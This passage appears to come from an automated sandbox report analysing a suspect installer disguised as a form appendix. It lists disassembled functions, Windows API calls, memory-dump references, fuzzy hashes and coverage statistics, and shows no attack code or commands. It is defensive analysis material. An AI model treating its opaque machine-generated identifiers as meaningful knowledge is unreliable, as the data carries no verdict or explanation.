                                                                                                              • Opcode Fuzzy Hash: a5e224c393a2dbf3682a9a167fecb91690cdd684f6bc615aac3eb61a4f6a471a
                                                                                                              • Instruction Fuzzy Hash: BB112532908150ABDB117FB51D4496F27B0EA52366728473FF491B22E2D23C0942D62E
                                                                                                              Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                                                                              • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                                                                              • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                                                                                • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404258612-0
                                                                                                              • Opcode ID: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction ID: 9c6242ade9da0ce9323d8482387ced81676d99406c202c21daae8146895b88d7
                                                                                                              • Opcode Fuzzy Hash: 19ad64cbfd362b12fd4dbc717af0eb9568492415a51530331d6a798985c52559
                                                                                                              • Instruction Fuzzy Hash: 1B115EB1900218BEDB11AFA5D941DEEBBB9EF04344B10807AF505F61A1E7389A55DB28
                                                                                                              Function 333E5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,333E1D66,00000000,00000000,?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue), ref: 333E5D13
                                                                                                              • GetLastError.KERNEL32(?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue,333EE190,FlsSetValue,00000000,00000364,?,333E5BC8), ref: 333E5D1F
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,333E5C88,333E1D66,00000000,00000000,00000000,?,333E5E85,00000006,FlsSetValue,333EE190,FlsSetValue,00000000), ref: 333E5D2D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 3177248105-0
                                                                                                              • Opcode ID: 05f8453a80f6c9bc20b4c2a6d4ad435f6c876a86479e8ecb39a1c575b192f875
                                                                                                              • Instruction ID: 4a8e72abf6b36bb9b823c77fb123839af7169b3f99ed9f85285484a0b5d1350c
                                                                                                              • Opcode Fuzzy Hash: 05f8453a80f6c9bc20b4c2a6d4ad435f6c876a86479e8ecb39a1c575b192f875
                                                                                                              • Instruction Fuzzy Hash: C3018837651332AFE7215EA8DC48A57779CAF067F2B548620F915E7140D724D806C7D0
                                                                                                              Function 333E63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E655C
                                                                                                                • Part of subcall function 333E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,333E62AB,00000000,?,?,?,?,00000016,?,?,333E62B8,00000000,00000000,00000000,00000000,00000000), ref: 333E62BE
                                                                                                                • Part of subcall function 333E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 333E62E0
                                                                                                                • Part of subcall function 333E62BC: TerminateProcess.KERNEL32(00000000), ref: 333E62E7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                              • String ID: *?$.
                                                                                                              • API String ID: 2667617558-3972193922
                                                                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                              • Instruction ID: 656ff3db9911929d2e44226c3e9a435a8a8d28cc6d70de3c99f2b4254692f286
                                                                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                              • Instruction Fuzzy Hash: CE518177E80229AFDF04CFA8CC80AADBBF9EF48354F24C169D454E7744E6359A418B50
                                                                                                              Function 333E16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strlen
                                                                                                              • String ID: : $Se.
                                                                                                              • API String ID: 4218353326-4089948878
                                                                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                              • Instruction ID: 9008fcdc45a487803e7485d7b701eb4154c04c40d79199da11e79945d7b3a220
                                                                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                              • Instruction Fuzzy Hash: 4811E376E00358AEDB11CFA8D880BDEFBFCAF09604F14805AE545E7252E6745A42CB65
                                                                                                              Function 333E1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 333E2903
                                                                                                                • Part of subcall function 333E35D2: RaiseException.KERNEL32(?,?,?,333E2925,00000000,00000000,00000000,?,?,?,?,?,333E2925,?,333F21B8), ref: 333E3632
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 333E2920
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                              • String ID: Unknown exception
                                                                                                              • API String ID: 3476068407-410509341
                                                                                                              • Opcode ID: 4748e8cd2c5c0ff0210ee9bb7658316953e602aa328c53e63c3695dabfeb28e2
                                                                                                              • Instruction ID: e5543433e9abb5fcb862a0d3b0dc69b99f8bd8c001d4e5567b2f69a2abfb64ce
                                                                                                              • Opcode Fuzzy Hash: 4748e8cd2c5c0ff0210ee9bb7658316953e602aa328c53e63c3695dabfeb28e2
                                                                                                              • Instruction Fuzzy Hash: 61F0AF3BD0832DBB8B00BEA4EC849AA776C9B00650F90C175F964D6990EF71EA66C5C1
                                                                                                              Function 00404F3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00404F6E
                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBF
                                                                                                                • Part of subcall function 0040401A: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040402C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction ID: cde12f86dd31b896884096c044580e22e17e4468508aba299e1a08f9367d6141
                                                                                                              • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction Fuzzy Hash: B90171B110420EAFDF209F11DD80A9B3666E7C4754F144037FB00762D1D73A9C62ABA9
                                                                                                              Function 004059A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 004059B4
                                                                                                              • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                                                              • Instruction ID: 39b4e1e9eedef81f1669a342cc471fdfd7c96e097019c4c4e899424100dca803
                                                                                                              • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                                                              • Instruction Fuzzy Hash: 86F08976748204ABD7104F56DC05BDB7B99DF91760F108037F904DA180D5B499548765
                                                                                                              Function 333E69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetOEMCP.KERNEL32(00000000,?,?,333E6C7C,?), ref: 333E6A1E
                                                                                                              • GetACP.KERNEL32(00000000,?,?,333E6C7C,?), ref: 333E6A35
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: |l>3
                                                                                                              • API String ID: 0-3212150807
                                                                                                              • Opcode ID: 6180087a7935150eb4016587a2eb1913b5fab1544441286b78dced9670bcb7f7
                                                                                                              • Instruction ID: 9b7d72de712d9edddbd394baf2f50032fcfd35939c99fef429c17301a4741722
                                                                                                              • Opcode Fuzzy Hash: 6180087a7935150eb4016587a2eb1913b5fab1544441286b78dced9670bcb7f7
                                                                                                              • Instruction Fuzzy Hash: 74F03CB2980219CFEB10EFA4C84876C77B9FB41335F58C344E4289A1D5EB7159468B41
                                                                                                              Function 00405493 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
                                                                                                              • CloseHandle.KERNEL32(?), ref: 004054C5
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004054A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                                                              • Instruction ID: 7b633475fa2e13aa519e78ab65903730338a863422e7bcfa27920a6c3387955a
                                                                                                              • Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
                                                                                                              • Instruction Fuzzy Hash: 55E0E674A00209ABDB10EFA4DD4596B7BBDEB10305B408531B914E2160D774D410CA79
                                                                                                              Function 004066EF Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction ID: 57e40c2acefb0b34dc51ba14adea8f2dd467a51599ed72ebaeee0bf9bad7d858
                                                                                                              • Opcode Fuzzy Hash: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
                                                                                                              • Instruction Fuzzy Hash: 9AA14171E00229CFDB28CFA8C8547ADBBB1FB44305F15816ED816BB281D7785A96DF44
                                                                                                              Function 004068F0 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction ID: 43f12e2563a4047fa425a185cdd3bc30ce3cfc84c0a70b15e8e3771f47715ab2
                                                                                                              • Opcode Fuzzy Hash: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
                                                                                                              • Instruction Fuzzy Hash: C3913070E00229CFDF28CF98C8547ADBBB1FB44305F15816AD816BB281D778AA96DF44
                                                                                                              Function 00406606 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction ID: 8348384c2088d0dca10fb2cfce14f15a8a06df42cb65cfce77c7d545600b327b
                                                                                                              • Opcode Fuzzy Hash: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
                                                                                                              • Instruction Fuzzy Hash: 2F813771D04228CFDF24DFA8C8847ADBBB1FB45305F25816AD416BB281C7789996DF04
                                                                                                              Function 0040610B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction ID: b0014496198728110a5296264d01e6ecaf8aeebecb777455980bb60694c24f35
                                                                                                              • Opcode Fuzzy Hash: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
                                                                                                              • Instruction Fuzzy Hash: B5818771D00228CFDF24DFA8C8447ADBBB1FB44301F11816AD956BB281C7786A96DF44
                                                                                                              Function 00406559 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction ID: ae8010f5f00a2a00aaab6ae45f29b4f91a62fe5ecd20e2395cd8f48d9039e886
                                                                                                              • Opcode Fuzzy Hash: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
                                                                                                              • Instruction Fuzzy Hash: 54711471E00229CFDF24DF98C8547ADBBB1FB44305F15806AD816BB281D7389996DF44
                                                                                                              Function 00406677 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction ID: 6e96038cb0222d47830e4b58fd7c52cae377976e6dc55ad69c20d6e03a859a59
                                                                                                              • Opcode Fuzzy Hash: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
                                                                                                              • Instruction Fuzzy Hash: 0A712371E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D7789A96DF44
                                                                                                              Function 004065C3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction ID: e293682df0fe9d8d1d8f36ea8a561890eb7f7220d29e3ea09188f27b28daafc9
                                                                                                              • Opcode Fuzzy Hash: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
                                                                                                              • Instruction Fuzzy Hash: 3A713471E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D778AA96DF44
                                                                                                              Function 004058D6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
                                                                                                              • lstrcmpiA.KERNEL32(00405B05,00000000), ref: 004058FE
                                                                                                              • CharNextA.USER32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 0040590F
                                                                                                              • lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                              • Instruction ID: c707f4e568105da07dfe4c817e4f3fc028cff82ea2bd98979edb1fd84d8cb9b2
                                                                                                              • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                              • Instruction Fuzzy Hash: 56F0C232604558FFC7129BA4DD0099EBBA8EF16360B2140AAE800F7211D274EE01ABA9

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:6.3%
                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                              Signature Coverage:3.2%
                                                                                                              Total number of Nodes:2000
                                                                                                              Total number of Limit Nodes:74
